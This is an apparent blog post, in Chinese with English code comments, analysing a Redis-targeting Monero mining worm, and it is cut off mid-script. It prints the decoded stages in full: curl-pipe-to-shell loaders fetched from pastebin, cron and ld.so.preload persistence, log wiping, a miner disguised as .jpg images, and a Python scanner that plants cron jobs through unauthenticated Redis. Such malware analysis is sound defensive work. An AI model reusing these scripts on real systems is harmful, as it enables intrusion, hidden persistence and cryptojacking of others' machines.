
针对Redis默认端口的挖矿脚本分析

起因

jpg

jpg

这台被入侵的机子,就是因为Redis没设密码,被搞了一波。

跟踪记录流水账

阿里云这张截图给出的命令行参数

/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh


直接看看这个链接的内容

1jane@debian:~$ curl https://pastebin.com/raw/xbY7p5Tb
2/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

继续跟踪链接

  1curl https://pastebin.com/raw/uuYVPLXd
  2
  3省略一堆被base64编码的内容
  4
  5解码一下
  6
  7curl https://pastebin.com/raw/uuYVPLXd | base64 -d
  8
  9#!/bin/bash
   # Stage-2 loader: this is the base64 body served by pastebin uuYVPLXd, which the
   # one-liner at xbY7p5Tb fetches and pipes through `base64 -d | /bin/bash`.
   # SHELL and PATH are pinned so the script behaves the same under cron as it
   # does from an interactive shell.
 10SHELL=/bin/sh
 11PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 12
 13function kills() {
     # Competitor cleanup: kill other miner families / earlier variants so this
     # campaign has the CPU and its pool port to itself. pkill interprets the
     # pattern as an ERE, so the unquoted `ddg*` below (when no file in the cwd
     # matches the glob) means "dd" followed by zero or more g — it matches any
     # process whose name contains "dd".
 14  pkill -f sourplum
 15  pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
 16
 17
     # Files dropped by earlier variants: grub-directory droppers, fake
     # httpd.conf / index backups in /tmp, and the a7b104c270 miner.
 18  rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
 19  rm -rf /tmp/*index_bak*
 20  rm -rf /tmp/*httpd.conf*
 21  rm -rf /tmp/*httpd.conf
 22  rm -rf /tmp/a7b104c270
 23
 24
     # Kill by pool hostname / port appearing in the command line. `ps auxf`
     # column 2 is the PID; `grep -v grep` drops the grep itself from the match.
 25  ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
 26  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs kill -9
 27  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs kill -9
 28  ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs kill -9
 29  ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs kill -9
 30  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs kill -9
 31  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs kill -9
 32  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs kill -9
 33  ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs kill -9
 34  ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs kill -9
 35  ps auxf | grep -v grep | grep "xmrig" | awk '{print $2}' | xargs kill -9
 36  ps auxf | grep -v grep | grep "xmrigDaemon" | awk '{print $2}' | xargs kill -9
 37  ps auxf | grep -v grep | grep "xmrigMiner" | awk '{print $2}' | xargs kill -9
 38
 39
 40
     # Kill by command-line substring. Several patterns are the names of
     # legitimate daemons (polkitd, acpid, irqbalance); `pkill -f` kills the
     # genuine service as well, which is a visible side effect on an infected
     # host. minerd and sourplum appear twice.
 41  pkill -f biosetjenkins
 42  pkill -f AnXqV.yam
 43  pkill -f xmrigDaemon
 44  pkill -f xmrigMiner
 45  pkill -f xmrig
 46  pkill -f Loopback
 47  pkill -f apaceha
 48  pkill -f cryptonight
 49  pkill -f stratum
 50  pkill -f mixnerdx
 51  pkill -f performedl
 52  pkill -f JnKihGjn
 53  pkill -f irqba2anc1
 54  pkill -f irqba5xnc1
 55  pkill -f irqbnc1
 56  pkill -f ir29xc1
 57  pkill -f conns
 58  pkill -f irqbalance
 59  pkill -f crypto-pool
 60  pkill -f minexmr
 61  pkill -f XJnRj
 62  pkill -f NXLAi
 63  pkill -f BI5zj
 64  pkill -f askdljlqw
 65  pkill -f minerd
 66  pkill -f minergate
 67  pkill -f Guard.sh
 68  pkill -f ysaydh
 69  pkill -f bonns
 70  pkill -f donns
 71  pkill -f kxjd
 72  pkill -f Duck.sh
 73  pkill -f bonn.sh
 74  pkill -f conn.sh
 75  pkill -f kworker34
 76  pkill -f kw.sh
 77  pkill -f pro.sh
 78  pkill -f polkitd
 79  pkill -f acpid
 80  pkill -f icb5o
 81  pkill -f nopxi
 82  pkill -f irqbalanc1
 83  pkill -f minerd
 84  pkill -f i586
 85  pkill -f gddr
 86  pkill -f mstxmr
 87  pkill -f ddg.2011
 88  pkill -f wnTKYg
 89  pkill -f deamon
 90  pkill -f disk_genius
 91  pkill -f sourplum
 92  pkill -f bashx
 93  pkill -f bashg
 94  pkill -f bashe
 95  pkill -f bashf
 96  pkill -f bashh
 97  pkill -f XbashY
 98  pkill -f libapache
 99
100
101
     # Remove dropped files — including this campaign's own payloads
     # (/tmp/kworkerds, /bin/kworkerds, /bin/config.json), which downloadrun /
     # downloadrunxm re-fetch afterwards.
102  rm -rf /tmp/httpd.conf
103  rm -rf /tmp/conn
104  rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
105  rm -rf /tmp/conns
106  rm -f /tmp/irq.sh
107  rm -f /tmp/irqbalanc1
108  rm -f /tmp/irq
109  rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
110
111
     # Kill whatever owns a connection involving common pool ports or two
     # hard-coded peers. `netstat -anp` column 7 is "PID/Program"; the second awk
     # keeps the PID. The bare `grep 3333` etc. also match addresses or PIDs that
     # merely contain those digits, so unrelated processes can be killed.
112  netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
113  netstat -anp | grep 3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
114  netstat -anp | grep 4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
115  netstat -anp | grep 5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
116  netstat -anp | grep 6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
117  netstat -anp | grep 7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
118  netstat -anp | grep 3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
119  netstat -anp | grep 14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
120  netstat -anp | grep 5.196.225.222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
121
122
123
     # 13531 is this campaign's own pool port (xmr.f2pool.com:13531 in the bundled
     # config.json). Only when no kworkerds process exists — i.e. something else
     # holds that connection — is the owner killed to free it.
124  y=$(ps aux | grep -v grep | grep kworkerds | wc -l)
125
126  if [ ${y} -eq 0 ]; then
127    netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
128  fi
129
130
131
132}
133
134function system() {
     # Persistence #1: drop a fetcher at /bin/httpdns (pastebin 698D7kZU — itself a
     # one-liner that pulls kDSLjxfQ and pipes it through `base64 -d | /bin/bash`;
     # the decoded script appears further down the page) and add a root entry to
     # /etc/crontab. curl first, wget as fallback, guarded only by file existence.
135  if [ ! -f "/bin/httpdns" ]; then
136    curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
137    if [ ! -f "/bin/httpdns" ]; then
138      wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
139    fi
     # `sed -i '$d'` deletes the LAST line of /etc/crontab before appending, so a
     # legitimate final entry is lost (presumably meant to replace an earlier copy
     # of this line — TODO confirm). "* */6 * * *" is minute=*, hour=*/6: it fires
     # every minute during hours 0/6/12/18, not once every six hours.
140    sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
141  fi
142
143}
144
145function top() {
     # Persistence #2 / hiding: a shared object served under a ".jpg" URL is
     # written to /usr/local/lib/libntp.so and registered in /etc/ld.so.preload,
     # so the dynamic loader maps it into every dynamically linked program started
     # afterwards. What the .so does is not visible on this page. Detection: the
     # contents of /etc/ld.so.preload and unpackaged files in /usr/local/lib.
146  if [ ! -f "/usr/local/lib/libntp.so" ]; then
147    curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
148    if [ ! -f "/usr/local/lib/libntp.so" ]; then
149      wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
150    fi
151  fi
     # No preload file yet: create it with this single entry. Existing file:
     # `sed -i '$d'` drops its last line before appending, clobbering whatever
     # legitimate entry was there.
152  if [ ! -f "/etc/ld.so.preload" ]; then
153    echo /usr/local/lib/libntp.so >/etc/ld.so.preload
154  else
155    sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >>/etc/ld.so.preload
156  fi
157
158
     # Timestomping: -r copies the access (-a) and modification (-m) times of
     # /bin/sh onto the dropped files; -c avoids creating missing ones.
     # libjdk.so is never written by this script (remnant of another variant —
     # TODO confirm).
159  touch -acmr /bin/sh /etc/ld.so.preload
160  touch -acmr /bin/sh /usr/local/lib/libjdk.so
161  touch -acmr /bin/sh /usr/local/lib/libntp.so
162
163
     # Anti-forensics: `echo 0>FILE` is parsed as `echo` with fd 0 (stdin)
     # redirected for writing to FILE, which truncates the file to zero bytes —
     # no "0" is written. Zero-length wtmp/secure/cron logs and an empty root
     # mailbox are an indicator of this script.
164  echo 0>/var/spool/mail/root # root's mail spool
165  echo 0>/var/log/wtmp # login records
166  echo 0>/var/log/secure # authentication records
167  echo 0>/var/log/cron # cron log
168}
169
170function python() {
     # Detached Python 2 one-liner: base64-decodes and exec()s an embedded loader,
     # which in turn fetches pastebin nYBpuAxT, base64-decodes and exec()s that
     # (both decoded listings appear further down the page; the second is the
     # Redis port-6379 scanner/spreader). Output is discarded and nohup detaches it
     # from this shell.
171  nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
     # Run-once marker: the top level only calls python() while /tmp/.tmpa is absent.
172  touch /tmp/.tmpa
173}
174
175function echocron() {
     # Persistence #3: the same "fetch xbY7p5Tb and pipe to sh" job written to
     # three cron locations — system cron.d plus the two per-user spool layouts
     # used by different distributions. `echo -e` expands \n, so each file ends
     # with a "##" comment line. "*/10 * * * *" fires every ten minutes;
     # "* */10 * * *" fires every minute during hours 0/10/20.
176  echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
177  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
178  mkdir -p /var/spool/cron/crontabs
179  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
180
     # Timestomp the cron files and directory to /bin/sh's access/modify times.
181  touch -acmr /bin/sh /etc/cron.d/root
182  touch -acmr /bin/sh /var/spool/cron/crontabs
183  touch -acmr /bin/sh /var/spool/cron/root
184  touch -acmr /bin/sh /var/spool/cron/crontabs/root
185
186}
187
188function downloadrun() {
     # Miner stage: fetch the payload (served under a ".jpg" URL on an image host;
     # the page shows it is a pre-configured XMR miner that logs "Pool logged in")
     # to /tmp/kworkerds and start it detached — but only when nothing already
     # has a connection matching 13531 (the pool port).
189  ps=$(netstat -anp | grep 13531 | wc -l)
190  if [ ${ps} -eq 0 ]; then
191    if [ ! -f "/tmp/kworkerds" ]; then
192      curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
193      if [ ! -f "/tmp/kworkerds" ]; then
194        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
195      fi
     # Both branches end with the same nohup line; the if/else only decides
     # whether a download happens first.
196      nohup /tmp/kworkerds >/dev/null 2>&1 &
197    else
198      nohup /tmp/kworkerds >/dev/null 2>&1 &
199    fi
200  fi
201}
202
203function downloadrunxm() {
     # Fallback path, called from the top level when no 13531 connection exists
     # 10 s after downloadrun: drops a pool config at /bin/config.json (its
     # pool_address is xmr.f2pool.com:13531 per the page) and a second miner
     # build at /bin/kworkerds, then starts it. chmod +x on the JSON is
     # functionally meaningless; both paths under /bin are indicators.
204  pm=$(netstat -anp | grep 13531 | wc -l)
205  if [ ${pm} -eq 0 ]; then
206    if [ ! -f "/bin/config.json" ]; then
207      curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
208      if [ ! -f "/bin/config.json" ]; then
209        wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
210      fi
211    fi
212    if [ ! -f "/bin/kworkerds" ]; then
213      curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
214      if [ ! -f "/bin/kworkerds" ]; then
215        wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
216      fi
217      nohup /bin/kworkerds >/dev/null 2>&1 &
218    else
219      nohup /bin/kworkerds >/dev/null 2>&1 &
220    fi
221  fi
222}
223
224update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
225
   # Remote kill/update switch: the paste returns "update" or "noupdate" (the
   # page observed "noupdate"). The `${update}x = "update"x` form keeps the test
   # well-formed when curl fails and the variable is empty.
226if [ ${update}x = "update"x ]; then
   # "update": wipe the current payloads (and /tmp/lock*, presumably the miner's
   # lock files — TODO confirm), keep only the cron re-fetch so the next run
   # installs whatever the paste serves next.
227  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
228  echocron
229else
   # Normal infection sequence: spreader once (marker /tmp/.tmpa), competitor
   # cleanup, miner, cron persistence, /bin/httpdns + /etc/crontab, ld.so.preload
   # + log wiping; after 10 s fall back to the /bin miner if no 13531 connection
   # is up.
230  if [ ! -f "/tmp/.tmpa" ]; then
231    rm -rf /tmp/.tmp
232    python
233  fi
234  kills
235  downloadrun
236  echocron
237  system
238  top
239  sleep 10
240  port=$(netstat -anp | grep 13531 | wc -l)
241  if [ ${port} -eq 0 ]; then
242    downloadrunxm
243  fi
244fi
245#
246#�

function有点多,用Atom折叠下。

jpg

 1update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
 2
 3if [ ${update}x = "update"x ]; then
 4  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
 5  echocron
 6else
 7  .
 8  .
 9  .
10fi  

脚本执行的第一步就是根据update返回值确定是不是要更新。

现在我这个时间点去访问,是noupdate

1curl https://pastebin.com/raw/C4ZhQFrH
2
3noupdate

rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds

用脚都能够猜得出这些文件有问题,挖矿脚本需要更新的东西还能是啥子。

看看这个echocron的function干了啥

 1function echocron() {
    # Writes the same fetch-and-pipe-to-sh job into three cron locations
    # (system cron.d plus two per-user spool layouts), then timestomps the files
    # to /bin/sh's access/modify times. `echo -e` expands the trailing \n##.
 2  echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
 3  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
 4  mkdir -p /var/spool/cron/crontabs
 5  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
 6
 7  touch -acmr /bin/sh /etc/cron.d/root
 8  touch -acmr /bin/sh /var/spool/cron/crontabs
 9  touch -acmr /bin/sh /var/spool/cron/root
10  touch -acmr /bin/sh /var/spool/cron/crontabs/root
11
12}
13

这个意图就非常之明显啦,添加定时任务到系统里面,让这挖矿生生不息。

留意一下,这个获取脚本的地址,恰好不就是现在分析的这个脚本咩。

1/etc/cron.d/root
2/var/spool/cron/root
3/var/spool/cron/crontabs
4/var/spool/cron/crontabs/root

上面的文件还用touch -acmr把时间戳改成跟/bin/sh一样,怕是防止运维用find找出来吧。


1if [ ! -f "/tmp/.tmpa" ]; then
2  rm -rf /tmp/.tmp
3  python
4fi

判断有没有/tmp/.tmpa,没有就删掉/tmp/.tmp,再调用python这个function。

怀疑.tmp对于apache有较大影响。

1function python() {
   # Detached Python 2 one-liner that base64-decodes and exec()s the loader
   # shown next on the page; /tmp/.tmpa is the run-once marker the top level checks.
2  nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
3  touch /tmp/.tmpa
4}

这个/tmp/.tmpa,应该就是判定有没有运行过这个python脚本的了。

现在看看这个python脚本运行的是啥子

先来个base64解码

 1#coding: utf-8
  # Decoded payload of the `python -c` one-liner in python(). Python 2 only
  # (urllib.urlopen). Downloads pastebin nYBpuAxT, base64-decodes it and exec()s
  # the result — the Redis scanner listed next on the page. Any error is
  # swallowed, so the process exits quietly without a trace on stderr.
 2import urllib
 3import base64
 4
 5d= 'https://pastebin.com/raw/nYBpuAxT'
 6try:
 7    page=base64.b64decode(urllib.urlopen(d).read())
 8    exec(page)
 9except:
10    pass
1curl https://pastebin.com/raw/nYBpuAxT | base64 -d

实际上他要运行的脚本就是这个

 1#! /usr/bin/env python
 2#coding: utf-8
 3
 4import threading
 5import socket
 6from re import findall
 7import httplib
 8
  # Shared target list: filled by get_ip_list(), consumed by runPortscan().
 9IP_LIST = []
10
11class scanner(threading.Thread):
      # One worker thread per target host. The attributes below are class-level,
      # i.e. shared by all workers: tlist/maxthreads cap concurrency at 100,
      # evnt wakes runPortscan() when a slot frees, lck guards tlist.
12    tlist = []
13    maxthreads = 100
14    evnt = threading.Event()
15    lck = threading.Lock()
16
17    def __init__(self,host):
18        threading.Thread.__init__(self)
19        self.host = host
      # Unauthenticated-Redis write: connect to TCP/6379 and, without any AUTH,
      # store a crontab line as a key, point the RDB dump at /etc/cron.d/root
      # via CONFIG SET dir/dbfilename, then SAVE so redis-server itself writes
      # the file. The \n padding presumably keeps the cron line on a line of its
      # own amid the binary RDB framing (TODO confirm how the target's cron
      # parses it). This is how the passwordless Redis in the write-up was hit.
      # Hardening that stops it: requirepass / protected-mode, bind to loopback,
      # rename-command CONFIG, and running redis-server as an unprivileged user
      # so it cannot write into /etc/cron.d. Replies are never read; any
      # failure is silently ignored.
20    def run(self):
21        try:
22            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23            s.settimeout(5)
24            s.connect((self.host, 6379))
25            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
26            s.send('config set dir /etc/cron.d\r\n')
27            s.send('config set dbfilename root\r\n')
28            s.send('save\r\n')
29            s.close()
30        except Exception:
31            pass
      # Deregister this worker and wake the producer once below the limit.
32        scanner.lck.acquire()
33        scanner.tlist.remove(self)
34        if len(scanner.tlist) < scanner.maxthreads:
35            scanner.evnt.set()
36            scanner.evnt.clear()
37        scanner.lck.release()
38
      # Static factory: register the new thread under the lock, then start it.
39    def newthread(host):
40        scanner.lck.acquire()
41        sc = scanner(host)
42        scanner.tlist.append(sc)
43        scanner.lck.release()
44        sc.start()
45
46    newthread = staticmethod(newthread)
47
48def get_ip_list():
    # Learns the host's public IP from ident.me, keeps the first two octets
    # (the regex's dots are unescaped, so `\d+.\d+.` matches e.g. "1.2." of
    # "1.2.3.4") and enumerates that /16 into IP_LIST. range(0, 255) stops at
    # 254, so .255 addresses are never listed. Any exception leaves IP_LIST
    # empty. Network signature: a single HTTP GET to ident.me followed by a
    # burst of connections to TCP/6379 across the host's own /16.
49    try:
50        url = 'ident.me'
51        conn = httplib.HTTPConnection(url, port=80, timeout=10)
52        req = conn.request(method='GET', url='/', )
53        result = conn.getresponse()
54        ip2 = result.read()
55        ips2 = findall(r'\d+.\d+.', ip2)[0]
56        for i in range(0, 255):
57            ip_list1 = (ips2 + (str(i)))
58            for g in range(0, 255):
59                IP_LIST.append(ip_list1 + '.' + (str(g)))
60    except Exception:
61        pass
62
63def runPortscan():
    # Producer: build the target list, then spawn one scanner per host, blocking
    # on scanner.evnt whenever maxthreads workers are alive; finally join
    # whatever is still registered in tlist.
64    get_ip_list()
65    for host in IP_LIST:
66        scanner.lck.acquire()
67        if len(scanner.tlist) >= scanner.maxthreads:
68            scanner.lck.release()
69            scanner.evnt.wait()
70        else:
71            scanner.lck.release()
72        scanner.newthread(host)
73    for t in scanner.tlist:
74        t.join()
75
  # exec(page) in the loader runs in the loader's own globals, where __name__ is
  # "__main__" (it was started via `python -c`), so the scan starts immediately.
76if __name__ == "__main__":
77    runPortscan()
78

粗略地看了两下,就是一个扫Redis默认端口(6379)并且传播挖矿脚本的操作。

这台被入侵的机子,就是因为Redis没设密码,被搞了一波。

1s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
2s.settimeout(5)
3s.connect((self.host, 6379))
4s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
5s.send('config set dir /etc/cron.d\r\n')
6s.send('config set dbfilename root\r\n')
7s.send('save\r\n')
8s.close()
 1url = 'ident.me'
 2conn = httplib.HTTPConnection(url, port=80, timeout=10)
 3req = conn.request(method='GET', url='/', )
 4result = conn.getresponse()
 5ip2 = result.read()
 6ips2 = findall(r'\d+.\d+.', ip2)[0]
 7for i in range(0, 255):
 8    ip_list1 = (ips2 + (str(i)))
 9    for g in range(0, 255):
10        IP_LIST.append(ip_list1 + '.' + (str(g)))

继续往下看

 1kills
 2downloadrun
 3echocron
 4system
 5top
 6sleep 10
 7port=$(netstat -anp | grep 13531 | wc -l)
 8if [ ${port} -eq 0 ]; then
 9  downloadrunxm
10fi

看看这个kills的function干了啥

开始的两行就很interesting了,先把同行的挖矿给干了。

1pkill -f sourplum
2pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

第一行是干掉sourplum

第二行是干掉wnTKYg,ddg则是负责在wnTKYg被杀掉后把它重新拉起来的。

1rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
2rm -rf /tmp/*index_bak*
3rm -rf /tmp/*httpd.conf*
4rm -rf /tmp/*httpd.conf
5rm -rf /tmp/a7b104c270

不清楚第一行的删除有什么用,但是涉及到/boot的东西,估计都蛋疼。

后几行都是删掉了apache的备份。

最后一行,a7b104c270,这个是挖矿的。

整个kill的function看下来,都是针对于apache和挖矿恶意程序。

跟这次比较相关就下面这些

1rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
2
3y=$(ps aux | grep -v grep | grep kworkerds | wc -l)
4
5if [ ${y} -eq 0 ]; then
6  netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
7fi

从这几行基本可以判定,kworkerds就是他的挖矿程序。

要是13531这个端口被占用,又不是这个kworkerds,就kill掉,腾出来给他挖矿用。

把后面遇到的config.json拿到这里来,就很清晰了。

1"url": "stratum+tcp://xmr.f2pool.com:13531",

看看这个downloadrun的function干了啥

 1function downloadrun() {
    # Fetches the miner (served under a ".jpg" URL on an image host) to
    # /tmp/kworkerds and starts it detached, only when nothing already has a
    # connection matching 13531 (the pool port). Both branches of the inner
    # if end with the same nohup line.
 2  ps=$(netstat -anp | grep 13531 | wc -l)
 3  if [ ${ps} -eq 0 ]; then
 4    if [ ! -f "/tmp/kworkerds" ]; then
 5      curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
 6      if [ ! -f "/tmp/kworkerds" ]; then
 7        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
 8      fi
 9      nohup /tmp/kworkerds >/dev/null 2>&1 &
10    else
11      nohup /tmp/kworkerds >/dev/null 2>&1 &
12    fi
13  fi
14}

thyrsi.com,一个图床站。

这里稍微做了下伪装:把程序当成.jpg图片放在图床上。

kworkerds下到/tmp,并且运行。

这个下载链接在国内速度真是好差,这可能就是为啥在这次被入侵的机子上面找不到这个程序emmm。

但是在海外下载是没有问题的。

1root@659b8ee8ecf6:/# chmod 777 kworkerds
2root@659b8ee8ecf6:/# ./kworkerds
3[2018-09-03 18:31:58] : Autoconf L3 size detected at 3072 KB.
4[2018-09-03 18:31:58] : Autoconf core count detected as 2 on Linux.
5[2018-09-03 18:31:58] : Starting 1x thread, affinity: 0.
6[2018-09-03 18:31:58] : Starting 1x thread, affinity: 1.
7[2018-09-03 18:31:59] : Dev pool connected. Logging in...
8[2018-09-03 18:32:01] : Pool logged in.

在容器上面跑了一下,确实是一个挖矿程序,CPU一下子就上天了。

1docker diff debian
2
3C /tmp
4A /tmp/.systemd-private-23024397a2adb34112feb510f90ad653.service-3vFbca
5A /tmp/.systemd-private-45a30b14252fad11672e49bbbda5c08f.service-5qFboa
6A /tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
7A /kworkerds

在输出的文件/tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa里面可以看到:

 1"pool_list" :
 2[
 3	{"pool_address" : "xmr.f2pool.com:13531",
 4    "wallet_address" : "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.bashx",
 5    "rig_id" : "",
 6    "pool_password" : "",
 7    "use_nicehash" : false,
 8    "use_tls" : false,
 9    "tls_fingerprint" : "",
10    "pool_weight" : 1
11    },
12],

这个应该是一个已经封装好的挖矿程序(钱包地址和矿池都写好了),开箱即用。2333

哪怕没有下载后面的config.json都能够跑。



看看这个system的function干了啥

 1function system() {
    # Drops the /bin/httpdns fetcher (pastebin 698D7kZU, decoded below on the
    # page) and appends a root entry to /etc/crontab. `sed -i '$d'` deletes the
    # last line of /etc/crontab first, so any legitimate final entry is lost.
    # "* */6 * * *" fires every minute during hours 0/6/12/18, not every 6 h.
 2  if [ ! -f "/bin/httpdns" ]; then
 3    curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
 4    if [ ! -f "/bin/httpdns" ]; then
 5      wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
 6    fi
 7    sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
 8  fi
 9
10}

先看看这个链接是啥玩儿

1curl https://pastebin.com/raw/698D7kZU
2
3/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash
4

又需要你再获取再解码,他不烦吗?

最后得到下面的内容

 1#!/bin/sh
  # Third script (pastebin kDSLjxfQ, base64-decoded): the body behind /bin/httpdns.
  # It uses the bash-only `function` keyword under #!/bin/sh; that works in
  # practice only because httpdns pipes this text into /bin/bash rather than
  # executing the file under /bin/sh.
 2SHELL=/bin/sh
 3PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 4
 5function downloadrun() {
    # Same as downloadrun in the stage-2 script (miner to /tmp/kworkerds, started
    # only when no connection matches 13531), with --connect-timeout 120 on curl.
 6  ps=$(netstat -anp | grep 13531 | wc -l)
 7  if [ ${ps} -eq 0 ]; then
 8    if [ ! -f "/tmp/kworkerds" ]; then
 9      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
10      if [ ! -f "/tmp/kworkerds" ]; then
11        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
12      fi
13      nohup /tmp/kworkerds >/dev/null 2>&1 &
14    else
15      nohup /tmp/kworkerds >/dev/null 2>&1 &
16    fi
17  fi
18}
19
20function downloadrunxm() {
    # Same fallback as in the stage-2 script: pool config to /bin/config.json and
